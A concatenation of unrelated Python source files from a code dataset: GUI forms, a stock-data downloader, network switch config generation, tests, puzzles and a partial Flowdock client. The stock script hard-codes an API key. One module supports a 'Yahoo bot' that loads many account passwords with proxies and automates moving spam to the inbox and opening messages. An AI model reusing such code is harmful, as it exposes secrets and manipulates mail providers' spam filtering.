Label(self.panel, text=\"Description:\",anchor='w').grid(row=1, sticky='w')\n self.txtDescription = Entry(self.panel,)\n self.txtDescription.grid(row=1, column=1, sticky='w')\n\n Label(self.panel, text=\"Enable:\").grid(row=2, sticky='w')\n self.ckEnable = Checkbutton(self.panel, onvalue=1, offvalue=0, variable = self.enable,)\n self.ckEnable.grid(row=2, column=1, sticky='w')\n\n self.engine.get_save_cancel(self, self)\n \n\n def on_open(self, selected_category = None):\n\n if selected_category is not None:\n self.insert_mode = False\n self.selected_category = selected_category\n msg = \"Update %s\" % (self.selected_category[1],)\n self.set_values()\n else:\n self.insert_mode = True\n msg = \"Insert new category\"\n self.enable.set(1)\n\n self.title(msg)\n self.txtCategory.focus()\n \n def on_save(self, evt):\n\n if self.on_fields_control()==False:\n\n msg = \"Please fill all fields.\"\n messagebox.showwarning(self.engine.title,msg)\n\n else:\n \n if messagebox.askyesno(self.engine.title, \"Do you want to save?\",parent=self) == True:\n\n args = self.get_values()\n\n if self.insert_mode == False:\n\n sql = self.engine.get_update_sql('categories','category_id')\n\n args = self.engine.get_update_sql_args(args, self.selected_category[0])\n \n elif self.insert_mode == True:\n\n sql = self.engine.get_insert_sql('categories',len(args))\n\n self.engine.write(sql,args)\n self.parent.on_open()\n\n if self.index is not None:\n self.parent.lstCategories.see(self.index)\n self.parent.lstCategories.selection_set(self.index)\n \n self.on_cancel()\n\n else:\n msg = \"Operation aborted.\"\n messagebox.showinfo(self.engine.title,msg) \n \n def on_cancel(self, evt=None):\n self.destroy()\n\n def get_values(self,):\n\n return (self.txtCategory.get(),\n self.txtDescription.get(),\n self.enable.get())\n \n def set_values(self,):\n\n self.txtCategory.insert(0, self.selected_category[1])\n self.txtDescription.insert(0, self.selected_category[2])\n self.enable.set(self.selected_category[3])\n\n def on_fields_control(self):\n\n objs = (self.txtCategory,self.txtDescription)\n\n for obj in objs:\n if not obj.get():\n ret = False\n break \n else:\n ret = True\n return ret \n \n","sub_path":"frames/category.py","file_name":"category.py","file_ext":"py","file_size_in_byte":4197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"449412483","text":"from alpha_vantage.timeseries import TimeSeries\nimport pickle \nimport numpy as np \nimport pandas as pd\nimport time\nimport glob\n\n# ts = TimeSeries(key='2N7U5OBZO5MQT4IL',output_format = 'pandas')\n# # Get json object with the intraday data and another with the call's metadata\n# data, meta_data = ts.get_daily_adjusted('GOOGL', outputsize='compact')\n\n# print(data.columns)\n#print(data['6. volume'])\n\n### Plan ; ^GSPC \n # for every tick in Nasdaq\n # get : [adj_close,volume]\n # [adj_open, volume]\n # save to text file \n\ndef save_NSDAQ():\n # ticks : \n ticks = pd.read_csv('../stock_data/constituents_csv.csv')\n\n donefiles = glob.glob('../stock_data/NASDAQ/*')\n done_ticks = [f.split('/')[-1] for f in donefiles]\n not_working = ['BF.B','CA','CSRA','DPS','EVHC','GGP','LLL','MON','NFX','PX']\n print(len(done_ticks))\n\n for tck in ticks.Symbol.values:\n if tck not in done_ticks and tck not in not_working:\n print(tck)\n ts = TimeSeries(key='2N7U5OBZO5MQT4IL',output_format = 'pandas')\n # Get json object with the intraday data and another with the call's metadata\n data,_ = ts.get_daily_adjusted(tck, outputsize='full')\n tosave = data[['5. adjusted close', '6. volume']]\n np.savetxt('../stock_data/NASDAQ/' + tck,tosave)\n time.sleep(10)\n\nsave_NSDAQ()","sub_path":"Tryout_notebook/get_stoks.py","file_name":"get_stoks.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"331010880","text":"'''\nCreated on Jan 15, 2013\n\n@author: v-honzha\n'''\n\nclass switch:\n level = 0\n number = 0\n uplink = []\n downlink = []\n def __init__(self, level, number, downlink, uplink):\n self.level = level\n self.number = number\n self.uplink = uplink\n self.downlink = downlink\n\n\n# init switches\nfs01 = [switch(0, 0, range(3), range(12, 15)), \n switch(0, 1, range(3,6), range(15, 18)),\n switch(0, 2, range(6,9), range(18, 21)),\n switch(0, 3, range(9,12), range(21, 24))]\n\nfs02 = [switch(1, 5, range(15, 18), range(21, 24)), \n switch(1, 11, range(12, 15), range(18, 21)),\n switch(1, 16, range(0, 3), range(3, 6)),\n switch(1, 17, range(6, 9), range(9, 12))]\n\nfs03 = [switch(1, 0, range(3), range(12, 15)), \n switch(1, 2, range(6,9), range(18, 21)),\n switch(1, 3, range(9,12), range(21, 24)),]\n\nfs04 = [switch(0, 6, range(3), range(12, 15)), \n switch(0, 7, range(3,6), range(15, 18)),\n switch(0, 8, range(6,9), range(18, 21)),\n switch(0, 9, range(9,12), range(21, 24))]\n\nfs05 = [switch(0, 4, [16, 12, 13], [14, 15, 17]), \n switch(0, 5, range(18,21), range(21, 24)),\n switch(0, 10, range(3), range(6, 9)),\n switch(0, 11, range(3, 6), range(9, 12))]\n\nfs06 = [switch(1, 6, range(3), range(12, 15)), \n switch(1, 7, range(3,6), range(15, 18)),\n switch(1, 8, range(6,9), range(18, 21)),\n switch(1, 9, range(9,12), range(21, 24))]\n\nfs07 = [switch(0, 12, range(3), range(12, 15)), \n switch(0, 13, range(3,6), range(15, 18)),\n switch(0, 14, range(6,9), range(18, 21)),\n switch(0, 15, range(9,12), range(21, 24))]\n\nfs08 = [switch(0, 16, range(3), range(6, 9)), \n switch(0, 17, range(3,6), range(9, 12))]\n\nfs09 = [switch(1, 12, range(3), range(12, 15)), \n switch(1, 13, range(3,6), range(15, 18)),\n switch(1, 14, range(6,9), range(18, 21)),\n switch(1, 15, range(9,12), range(21, 24))]\n\nfs10 = [switch(1, 1, range(3), range(3,6)), \n switch(1, 4, range(6,9), range(9,12)),\n switch(1, 10, range(12,15), range(15,18)),\n switch(2, 3, range(18, 24), [])]\n\ncs02 = [switch(2, 4, range(6), []),\n switch(2, 5, range(6,12), []),\n switch(2, 6, range(12,18), []),\n switch(2, 7, range(18,24), []),\n switch(2, 8, range(24,30), []),\n switch(2, 1, [30,31,32,36,37,38], []),\n switch(2, 2, [33,34,35,39,40,41], []),\n switch(2, 0, range(42,48), []),\n ]\n\nphy_switches = [(fs01, \"fs01\"), (fs02, \"fs02\"), (fs03, \"fs03\"), (fs04, \"fs04\"), (fs05, \"fs05\"), \n (fs06, \"fs06\"), (fs07, \"fs07\"), (fs08, \"fs08\"), (fs09, \"fs09\"), (fs10, \"fs10\")]\n\nserver_mac = \"00:00:01:01:01:01\"\ntor_mac = \"00:00:01:01:01:02\"\nfor phy, phy_name in phy_switches:\n for vrf_id in range(1, len(phy) + 1):\n sw = phy[vrf_id - 1]\n if sw.level == 0: #tor switch\n f = open(\"data/hydrap-tor-{0}-1.soc\".format(sw.number), \"w\")\n \n for l in sw.downlink:\n f.write(\"vlan create {vlan_id} pbm=cpu0,ge{port_id} ubm=ge{port_id}\\n\".\\\n format(vlan_id=l+1024, port_id=l))\n f.write(\"pvlan set ge{port_id} {vlan_id}\\n\".format(port_id=l, vlan_id=l+1024))\n f.write(\"l3 intf add vlan={vlan_id} mac={mac} intf={intf_id} vrf={vrf_id}\\n\".\\\n format(vlan_id=l+1024, mac=tor_mac, intf_id=l+1, vrf_id=vrf_id))\n f.write(\"\\n\")\n \n for l in sw.uplink:\n f.write(\"vlan create {vlan_id} pbm=cpu0,ge{port_id} ubm=ge{port_id}\\n\".\\\n format(vlan_id=l+1024, port_id=l))\n f.write(\"pvlan set ge{port_id} {vlan_id}\\n\".format(port_id=l, vlan_id=l+1024))\n f.write(\"l3 intf add vlan={vlan_id} mac={mac} intf={intf_id} vrf={vrf_id}\\n\".\\\n format(vlan_id=l+1024, mac=tor_mac, intf_id=l+1, vrf_id=vrf_id))\n f.write(\"\\n\")\n \n for dl in sw.downlink:\n f.write(\"l3 egress add mac={mac} intf={intf_id} port=ge{port_id}\\n\".\\\n format(mac=server_mac, intf_id=dl+1, port_id=dl))\n f.write(\"\\n\")\n \n for i in range(len(sw.downlink)):\n dl = sw.downlink[i]\n f.write(\"l3 l3table add vrf={vrf_id} ip={ip} intf={egress_id}\\n\".\\\n format(vrf_id=vrf_id, \\\n ip=\"10.11.{pod_id}.{index}\".format\\\n (pod_id=sw.number, index=i+2), egress_id=(vrf_id-1)*3+100002+i))\n f.close() \n \n","sub_path":"switchConfiguration/Generator.py","file_name":"Generator.py","file_ext":"py","file_size_in_byte":4635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"43172517","text":"\"\"\"\nCreated on Feb 11, 2015\n\n@author: Jason Bowles\n\"\"\"\nfrom rawdata_emca.runner.config_file_reader import ConfigFileReader\nfrom rawdata_emca import Base_Type\nimport os\nimport sys\nimport traceback\n\nclass RawProcessor(Base_Type):\n \"\"\"\n The raw processor is the entry point into the framework\n \n All directories and parameters that need to be processed should be passed in on instantiation\n \n params['files] should be a list of config files that should be processed, each will be added\n param['file'] gives the option to just add 1 file to be processed\n param['run_date'] optional parameter to define the actual run date of the framework (allow past date processing)\n param['log_file'] lists the file to be used for logging of the framework\n \n this class will then setup logging for the remainder of the run\n \"\"\"\n \n config_files = []\n config_entries = []\n run_date = None\n\n def __init__(self, params):\n \"\"\"\n Constructor\n \"\"\"\n Base_Type.__init__(self)\n self.print_only = False\n if params:\n if 'files' in params:\n self.addall_config_files(params['files'])\n if 'file' in params:\n self.add_config_file(params['file'])\n if 'run_date' in params:\n self.run_date = params['run_date']\n if params.get('print_only',False):\n self.print_only = True\n \n self.force_name = params.get('force',None)\n if 'log_file' in params:\n directory = os.path.dirname(os.path.realpath(params['log_file']))\n if not os.path.exists(directory):\n os.makedirs(directory)\n self.log_file = params['log_file']\n else:\n run_path = os.path.dirname(os.path.realpath(sys.argv[0]))\n directory = os.path.join(run_path,'log')\n if not os.path.exists(directory):\n os.makedirs(directory)\n self.log_file = os.path.join(directory,'rawdata.log')\n \n self.setup_logging()\n self.log_message(\"Kicking Off Raw Data Processor\", log_type='main', status='start', step='root', name='raw_processor')\n \n \n \n def prep_reader(self):\n params = {}\n #params['uuid'] = self.log_uuid\n if self.run_date:\n params['run_date'] = self.run_date\n if self.force_name:\n params['entry_name'] = self.force_name\n reader = ConfigFileReader(params)\n self.log_message(\"Begin Processing Config Files\",status='running')\n for f in self.config_files:\n reader.process_config(f)\n \n return reader\n \n def execute_entries(self):\n final_stat = 0\n try: \n self.log_message(\"About to Prep the Reader\", log_level=self.log_info(),status='start',step='load configs')\n reader = self.prep_reader()\n self.log_message(\"Reader Prepped\", status='complete')\n final_stat = reader.execute_entries(print_order=self.print_only)\n self.log_message('Raw Data Processor has Finished (Number of Failed Entries: {})'.format(final_stat),log_type='main',status='complete',step='root',name='raw_processor',log_level=self.log_debug())\n except Exception as err1:\n step = 'entry loading'\n if self.log_status == 'complete':\n step = 'entry executing'\n self.log_message('Problem while running: ' + str(err1) + ', issue found in: ('+step+')',log_level=self.log_error(),name='raw_processor',status='error')\n traceback.print_exc()\n return final_stat\n \n def execute_single_entry(self, entry_name):\n reader = self.prep_reader()\n return reader.execute_entry(entry_name)\n \n def addall_config_files(self,files):\n if files:\n for f in files:\n self.add_config_file(f)\n \n def add_config_file(self, filename):\n if filename:\n self.config_files.append(filename)","sub_path":"rawdata_emca/runner/raw_processor.py","file_name":"raw_processor.py","file_ext":"py","file_size_in_byte":4090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"581275615","text":"#Exercise 3\n\n#write a program that prints out all the elements of the list that are less than 5.\n\n#Extras:\n#1. Instead of printing the elements one by one, make a new list that has all the elements less than 5 from this list in it and print out this new list.\n#2. Write this in one line of Python.\n#3. Ask the user for a number and return a list that contains only elements from the original list a that are smaller than that number given by the user.\n\n#create lists\nsourcelist = [1 ,1 ,2 ,3 ,5 ,8 ,13 ,21 ,34 ,55 ,89]\nnewlist = []\n\n#insert element less than 5 from sourcelist to newlist using list comprehension\nnewlist = [element for element in sourcelist if element < 5]\n \nprint(newlist)\n\n#clear newlist\nnewlist.clear()\n\n#insert element less than a number from sourcelist to newlist using list comprehension\nnum = int(input(\"Please insert a number: \"))\n\nnewlist = [element for element in sourcelist if element < num]\n\nprint(\"This is a list of elements that less than \" + str(num) + \" : \" + str(newlist))\n","sub_path":"exercise_3.py","file_name":"exercise_3.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"512780321","text":"defaultMF_amp = 0.44\ndefaultMF_power = 0.51\ndefaultCSF_amp = 0.50\ndefaultCSF_power = 0.45\ndefaultCSF_max = 3\ndefaultq_power = -0.4\ndefaultq_min = 0.01\ndefault_aMean = 100.0 # log (AU)\ndefault_aSigma = 0.1 # log (AU)\n\n# Eventually we should add in separation properties. (a_mean, a_sigma)\n\nclass MultiplicityUnresolved(object):\n def __init__(self, \n MF_amp=0.44, MF_power=0.51,\n CSF_amp=0.50, CSF_power=0.45, CSF_max=3,\n q_power=-0.4, q_min=0.01):\n \"\"\"\n The properties of stellar companions.\n\n The number of stellar companions, their masses, and separations\n are be described by the following functions:\n\n Multiplicity Fraction -- the number of stellar systems that host \n multiple stars. In other words, the number of primary stars with\n companions. The multiplicity fraction (MF) is typically described\n as: \n B + T + Q + ...\n MF = ---------------------\n S + B + T + Q + ...\n\n where S = single, B = binary, T = triple, Q = quadruple, etc.\n The MF also changes with mass and this dependency can be \n described as a power-law:\n \n `MF(mass) = MF_amp * (mass ** MF_power)`\n\n Companion Star Fraction -- the expected number of companions in\n a multiple system. The companion star fraction (CSF) also \n changes with mass and this dependency can be described as\n a power-law:\n \n `CSF(mass) = CSF_amp * (mass ** CSF_power)`\n\n The companion star fraction is clipped to some maximum\n value, CSF_max. The actual number of companions is drawn \n from a Poisson distribution with an expectation value of CSF.\n\n Mass Ratio (Q) -- The ratio between the companion star \n mass and primary star mass, Q = (m_comp / m_prim ) has\n a probability density function described by a powerlaw:\n\n `P(Q) = Q ** q_power` for q_min <= Q <= 1\n\n Current observations show no significant mass dependence.\n\n Parameters\n ----------\n MF_amp : float\n The amplitude of the power-law describing the Multiplicity \n Fraction as a function of stellar mass. \n\n MF_power : float\n The power of the power-law describing the Multiplicity\n Fraction as a function of stellar mass.\n\n CSF_amp : float\n The amplitude of the power-law describing the companion star \n fraction as a function of stellar mass.\n\n CSF_power : float\n The power of the power-law describing the companion star \n fraction as a function of stellar mass.\n\n CSF_max : float\n The maximum allowed companion star fraction, which is the\n expectation value for the number of companion stars. Given\n a CSF_max = 3, some systems will still have more than 3 \n companions.\n\n q_power : float\n The power of the power-law describing the probability\n density function for the mass ratio.\n\n q_min : float\n The minimum allowed Q value for the probability\n density function of the mass ratio.\n \"\"\"\n \n self.MF_amp = MF_amp\n self.MF_pow = MF_power\n self.CSF_amp = CSF_amp\n self.CSF_pow = CSF_power\n self.CSF_max = CSF_max\n self.q_pow = q_power\n self.q_min = q_min\n\n def multiplicity_fraction(self, mass):\n \"\"\"\n Given a star's mass, determine the probability that the star is in a\n multiple system (multiplicity fraction = MF).\n\n Parameters\n ----------\n mass : float or numpy array\n Mass of primary star.\n\n Return\n ------\n mf : float or numpy array\n Multiplicity Fraction, the fraction of stars at this mass\n that will have one or more companions.\n \"\"\"\n # Multiplicity Fraction\n mf = self.MF_amp * mass ** self.MF_pow\n\n if np.isscalar(mf) and mf > 1:\n mf = 1\n else:\n mf[mf > 1] = 1\n\n return mf\n\n def companion_star_fraction(self, mass):\n \"\"\"\n Given a star's mass, determine the average number of\n companion stars (companion star fraction = CSF).\n\n Parameters\n ----------\n mass : float or numpy array\n Mass of primary star\n\n Return\n ------\n csf : float or numpy array\n Companion Star Fraction, the expected number of companions\n for a star at this mass.\n \"\"\"\n # Companion Star Fraction\n csf = self.CSF_amp * mass ** self.CSF_pow\n \n if np.isscalar(csf) and csf > self.CSF_max:\n csf = self.CSF_max\n else:\n csf[csf > self.CSF_max] = self.CSF_max\n\n return csf\n\n def random_q(self, x):\n \"\"\"\n Generative function for companion mass ratio, equivalent\n to the inverse of the CDF.\n\n `q = m_compnaion / m_primary`\n `P(q) = q ** beta` for q_min <= q <= 1\n\n Parameters\n ----------\n x : float or array_like\n Random number between 0 and 1.\n\n Return\n -------\n q : float or array_like\n companion mass ratio(s)\n \"\"\"\n b = 1.0 + self.q_pow\n q = (x * (1.0 - self.q_min ** b) + self.q_min ** b) ** (1.0 / b)\n\n return q\n\n def random_is_multiple(self, x, MF):\n return x < MF\n\n def random_companion_count(self, x, CSF, MF):\n n_comp = 1 + np.random.poisson((CSF / MF) - 1)\n\n return n_comp\n","sub_path":"popstar/imf/multiplicity.py","file_name":"multiplicity.py","file_ext":"py","file_size_in_byte":5774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"2975570","text":"from mixer.backend.django import mixer\nfrom sports.models import Sport, Sporttype\nfrom django.contrib.auth import get_user_model\nUser = get_user_model()\n\n\ndef test_sporttype_string():\n \"\"\"\n Test Sporttype string\n \"\"\"\n sporttype = mixer.blend(Sporttype)\n assert str(sporttype) == f'{sporttype.title}'\n\n\ndef test_sport_types_added():\n \"\"\"\n Test Sporttype can be added to DB\n \"\"\"\n mixer.blend(Sporttype)\n mixer.blend(Sporttype)\n assert len(Sporttype.objects.all()) == 2\n\n\ndef test_sport_types_added_is_published():\n \"\"\"\n Test Sporttype is not published by default\n \"\"\"\n sporttype = mixer.blend(Sporttype)\n assert sporttype.is_published is False\n\n\ndef test_sport_can_be_added(create_test_user):\n \"\"\"\n Test Sport can be added for Profile\n \"\"\"\n sporttype = mixer.blend(Sporttype)\n user = create_test_user()\n Sport.objects.create(\n profile=user.profile, sporttype=sporttype, level=3)\n\n assert len(Sporttype.objects.all()) == 1\n assert len(User.objects.all()) == 1\n assert len(Sport.objects.all()) == 1\n\n\ndef test_sport_string(create_test_user):\n \"\"\"\n Test Sport string\n \"\"\"\n sporttype = mixer.blend(Sporttype)\n user = create_test_user()\n sport = Sport.objects.create(\n profile=user.profile, sporttype=sporttype, level=3)\n assert str(sport) == f'{sport.profile} - {sport.sporttype} - {sport.level}'\n","sub_path":"backend/sports/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"385606929","text":"\"\"\"\n@@@@@@@@@@@@@@@@@@@@\n@ Peculiar Balance @\n@@@@@@@@@@@@@@@@@@@@\n\nCan we save them? Beta Rabbit is trying to break into a lab that contains the\nonly known zombie cure - but there's an obstacle. The door will only open if a\nchallenge is solved correctly. The future of the zombified rabbit population is\nat stake, so Beta reads the challenge: There is a scale with an object on the\nleft-hand side, whose mass is given in some number of units.\n\nPredictably, the task is to balance the two sides.\nBut there is a catch: You only have this peculiar weight set,\nhaving masses 1, 3, 9, 27, ... units. That is, one for each power of 3.\n\nBeing a brilliant mathematician, Beta Rabbit quickly discovers that any number\nof units of mass can be balanced exactly using this set. To help Beta get into\nthe room, write a method called answer(x), which outputs a list of strings\nrepresenting where the weights should be placed, in order for the two sides to\nbe balanced, assuming that weight on the left has mass x units.\n\nThe first element of the output list should correspond to the 1-unit weight,\nthe second element to the 3-unit weight, and so on. Each string is one of:\n\n\"L\" : put weight on left-hand side\n\"R\" : put weight on right-hand side\n\"-\" : do not use weight\n\nTo ensure that the output is the smallest possible, the last element of the list\nmust not be \"-\". x will always be a positive integer, no larger than 1000000000.\n\"\"\"\n\n# Balanced ternary is a non-standard positional numeral system (a balanced form), useful for comparison logic.\n\ndef inc_one_digit(n):\n if n == 'L':\n return False, '-'\n elif n == '-':\n return False, 'R'\n elif n == 'R':\n return True, 'L'\n\ndef dec_one_digit(n):\n if n == 'L':\n return True, 'R'\n elif n == '-':\n return False, 'L'\n elif n == 'R':\n return False, '-'\n\ndef number(A):\n s = ['-'] # 0\n for _ in xrange(A):\n s = increase(s)\n return s\n\ndef evaluate(A):\n s = 0\n for i, x in enumerate(A):\n s += 3**i * ({'L': -1, '-': 0, 'R': 1}[x])\n return s\n\ndef increase(A):\n B = []\n c = True\n for x in A:\n if c:\n c, x = inc_one_digit(x)\n B.append(x)\n if c:\n B.append('R')\n return B\n\ndef add_one_digit(A, B):\n if A == 'L' and B == 'L':\n return -1, 'R'\n elif A == 'L' and B == '-':\n return 0, 'L'\n elif A == 'L' and B == 'R':\n return 0, '-'\n elif A == '-' and B == 'L':\n return 0, 'L'\n elif A == '-' and B == '-':\n return 0, '-'\n elif A == '-' and B == 'R':\n return 0, 'R'\n elif A == 'R' and B == 'L':\n return 0, '-'\n elif A == 'R' and B == '-':\n return 0, 'R'\n elif A == 'R' and B == 'R':\n return 1, 'L'\n\ndef trim(A):\n for i in range(len(A)):\n if A[len(A)-i-1] != '-':\n return A[:len(A)-i]\n return A\n\ndef add(A, B):\n l = max(len(A), len(B)) + 1\n A = list(A) + (['-' for _ in xrange(l-len(A))])\n B = list(B) + (['-' for _ in xrange(l-len(B))])\n C = ['-' for _ in xrange(l)]\n c = 0\n for x in xrange(l):\n c, v = add_one_digit(A[x], B[x])\n cc, v = add_one_digit(v, C[x])\n c += cc\n C[x] = v\n if c < 0:\n while c < 0:\n x += 1\n cc, v = dec_one_digit(C[x])\n c += 1\n C[x] = v\n if cc: c -= 1\n elif c > 0:\n while c > 0:\n x += 1\n cc, v = inc_one_digit(C[x])\n c -= 1\n C[x] = v\n if cc: c += 1\n return trim(C)\n\ndef ten_to_the_nth(x):\n A = number(1)\n B = ['-']\n for _ in xrange(x):\n for _ in xrange(10):\n B = add(A, B)\n A = B\n B = ['-']\n return A\n\ndef answer(x):\n n = 0\n S = ['-']\n while x:\n A = x % 10\n ten = ten_to_the_nth(n)\n for _ in xrange(A):\n S = add(S, ten)\n x -= A\n x = x / 10\n n += 1\n return S\n","sub_path":"combinatorics/peculiar_balance.py","file_name":"peculiar_balance.py","file_ext":"py","file_size_in_byte":4001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"139959319","text":"import os\nimport csv\nimport click\nimport random\nfrom enum import Enum\n\nfrom app import app_settings\n\nclass Singleton:\n\tdef __init__(self, cls):\n\t\tself._cls = cls\n\n\tdef get_instance(self):\n\t\ttry:\n\t\t\treturn self._instance\n\t\texcept AttributeError:\n\t\t\tself._instance = self._cls()\n\n\t\treturn self._instance\n\n\tdef __call__(self):\n\t\traise TypeError('Singletons must be accessed through `get_instance()`.')\n\n\tdef __instancecheck__(self, inst):\n\t\treturn isinstance(inst, self._cls)\n\n\ndef get_profiles_paths():\n\treturn [\n os.path.join(app_settings.FIREFOX_PROFILES_PATH, d) for d in os.listdir(app_settings.FIREFOX_PROFILES_PATH)\n if os.path.isdir(os.path.join(app_settings.FIREFOX_PROFILES_PATH, d))\n and 'default' not in d\n ]\n\n\nclass Profile:\n\tdef __init__(self, email, password, proxy=None):\n\t\tself.email = email\n\t\tself.password = password\n\t\tself.proxy = proxy\n\n\tdef __repr__(self):\n\t\treturn f''\n\nclass List:\n\tdef __init__(self):\n\t\tself.profiles = None\n\n\nclass Proxy:\n\tdef __init__(self, ip, port=app_settings.DEFAULT_PORT):\n\t\tself.ip = ip\n\t\tself.port = port\n\n\tdef __repr__(self):\n\t\treturn f''\n\n\nclass Actions(Enum):\n\tSPAM_REPORT_ALL_TO_INBOX\t\t= 0\n\tINBOX_SELECT_ALL_MARK_AS_READ\t= 1\n\tSPAM_SELECT_ALL_MARK_AS_READ\t= 2\n\tINBOX_ARCHIVE_ALL\t\t\t\t= 3\n\tINBOX_OPEN_MESSAGES\t\t\t\t= 4\n\tSPAM_OPEN_MESSAGES\t\t\t\t= 5\n\tINBOX_OPEN_PLUS_CLICK_MESSAGES\t= 6\n\n\ndef load_profiles_from_csv():\n\tprofiles_list = []\n\twith open(app_settings.ACCOUNTS_FILE) as f:\n\t\treader = csv.DictReader(f)\n\t\tfor line in reader:\n\t\t\t# create profile, proxy.\n\t\t\tproxy = None\n\t\t\tif line['proxy']:\n\t\t\t\tparts = line['proxy'].split(':')\n\t\t\t\tif len(parts) == 2:\n\t\t\t\t\tip, port = parts\n\t\t\t\t\tproxy = Proxy(ip, port)\n\t\t\t\telse:\n\t\t\t\t\tproxy = Proxy(parts[0])\n\n\t\t\tif proxy:\n\t\t\t\tprofile = Profile(line['email'], line['password'], proxy)\n\t\t\telse:\n\t\t\t\tprofile = Profile(line['email'], line['password'])\n\t\t\tprofiles_list.append(profile)\n\treturn profiles_list\n\n\ndef show_introduction():\n\tintroduction = f\"\"\"\n+----------------------------------------------------------------------------+\n| |\n| ██╗ ██╗ █████╗ ██╗ ██╗ ██████╗ ██████╗ ██████╗ ██████╗ ████████╗ |\n| ╚██╗ ██╔╝██╔══██╗██║ ██║██╔═══██╗██╔═══██╗ ██╔══██╗██╔═══██╗╚══██╔══╝ |\n| ╚████╔╝ ███████║███████║██║ ██║██║ ██║ ██████╔╝██║ ██║ ██║ |\n| ╚██╔╝ ██╔══██║██╔══██║██║ ██║██║ ██║ ██╔══██╗██║ ██║ ██║ |\n| ██║ ██║ ██║██║ ██║╚██████╔╝╚██████╔╝ ██████╔╝╚██████╔╝ ██║ |\n| ╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚═╝ |\n| |\n| |\n| {app_settings.APP_NAME} v{app_settings.APP_VERSION} Developed By: {app_settings.DEVELOPED_BY} |\n| |\n| Powred By: Omega Capital. Contact: {app_settings.CONTACT_ME} |\n| |\n+----------------------------------------------------------------------------+\n\n\"\"\"\n\tclick.secho(introduction, fg='bright_black')\n\n\ndef show_actions_list():\n\tactions = get_available_actions()\n\th1 = ' Yahoo actions list:'\n\tclick.secho(h1, fg='cyan')\n\tclick.secho('-' * len(h1), fg='cyan')\n\n\tfor i, action in enumerate(actions, 1):\n\t\taction_string_parts = action.name.split('_')\n\t\taction_pos = action_string_parts[0]\n\t\taction_name = '_'.join(action_string_parts[1:])\n\t\tprint(f' {i} - ({action_pos}) {action_name}')\n\n\ndef get_action():\n\n\tactions = get_available_actions()\n\tshow_actions_list()\n\ttry:\n\t\tclick.secho('\\nPlease choose the action you want ? (Ctrl+C to exit): ', fg='yellow', nl=False)\n\t\tnum = int(input())\n\t\twhile num < 1 or num > len(actions):\n\t\t\tclick.secho('Opps!, Action not found.', fg='red')\n\t\t\tclick.secho('Please choose an action from the list above ? (Ctrl+C to exit): ', fg='yellow', nl=False)\n\t\t\tnum = int(input())\n\texcept KeyboardInterrupt:\n\t\texit()\n\treturn actions[num - 1]\n\n\ndef get_actions():\n\tactions = get_available_actions()\n\tresult = []\n\tshow_actions_list()\n\ttry:\n\t\tclick.secho('\\nPlease choose actions you want ? (Ctrl+C to exit): ', fg='yellow', nl=False)\n\t\tactions_string = [ int(n) for n in str(input()).split(' ')]\n\t\tfor num in actions_string:\n\t\t\twhile num < 1 or num > len(actions):\n\t\t\t\tclick.secho(f'Opps!, Action {num} not found.', fg='red')\n\t\t\t\texit()\n\t\t\t\t# click.secho('Please choose actions from the list above ? (Ctrl+C to exit): ', fg='yellow', nl=False)\n\t\t\t\t# num = int(input())\n\t\t\tresult.append(actions[num - 1])\n\texcept KeyboardInterrupt:\n\t\texit()\n\treturn result\n\n\ndef get_available_actions():\n\tfrom app import Yahoo\n\treturn Yahoo.get_available_actions()\n\n\ndef get_mailbox_messages_range(total_messages):\n\t\"\"\" Get the max and min messages in the inbox \"\"\"\n\tx_min = min(total_messages, app_settings.MESSAGES_MIN_OPEN)\n\tx_max = min(total_messages, app_settings.MESSAGES_MAX_OPEN)\n\treturn x_min, x_max\n\ndef get_amount_of_message(total_messages):\n\t\"\"\"Get the amount of messages to open.\"\"\"\n\treturn random.randint(*get_mailbox_messages_range(total_messages))\n\n\ndef prettify_seconds(sec):\n\tif sec < 60: \t\t# less than 1 minute.\n\t\treturn '%.2f seconds' % sec\n\telif sec / 60 < 60: # less than 1 hour.\n\t\treturn '%.2f minutes' % (sec / 60)\n\telif sec / 3600 < 24: # less than 1 day.\n\t\treturn '%.2f hours' % (sec / 3600)\n\n\t# return in days.\n\treturn '%.2f days' % (sec / 86400)\n\n","sub_path":"app/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":6217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"12267034","text":"# coding: utf-8\nimport requests\nimport json\nfrom re import match, IGNORECASE\n\nMESSAGES_API_URL = \"https://api.flowdock.com/messages\"\n\nEMAIL = r\"[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*@(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\"\nALPHANUMERIC_UNDERSCORES_WHITESPACE = r'^[a-z0-9_ ]+$'\n\n\n# \"flow_token\": \"cbc4d9ca8000ad74058724084f929fff\",\n# \"event\": \"activity\",\n# \"author\": {\n# \"name\": \"Marty\",\n# \"avatar\": \"https://avatars.githubusercontent.com/u/3017123?v=3\"\n# },\n# \"title\": \"updated ticket\",\n# \"external_thread_id\": \"1234567\",\n# \"thread\": {\n# \"title\": \"Polish the flux capacitor\",\n# \"body\": \"The flux capacitor has been in storage for more than 30 years and it needs to be spick and span for the re-launch.\",\n# \"status\": {\n# \"color\": \"green\",\n# \"value\": \"open\"\n# }\n# }\n\n\nclass MessageAPI(object):\n\tAPI_URL = MESSAGES_API_URL\n\n\tdef __init__(self, flow_token, author, thread_title, thread_body, thread_id, avatar = None):\n\t\tself.msg = 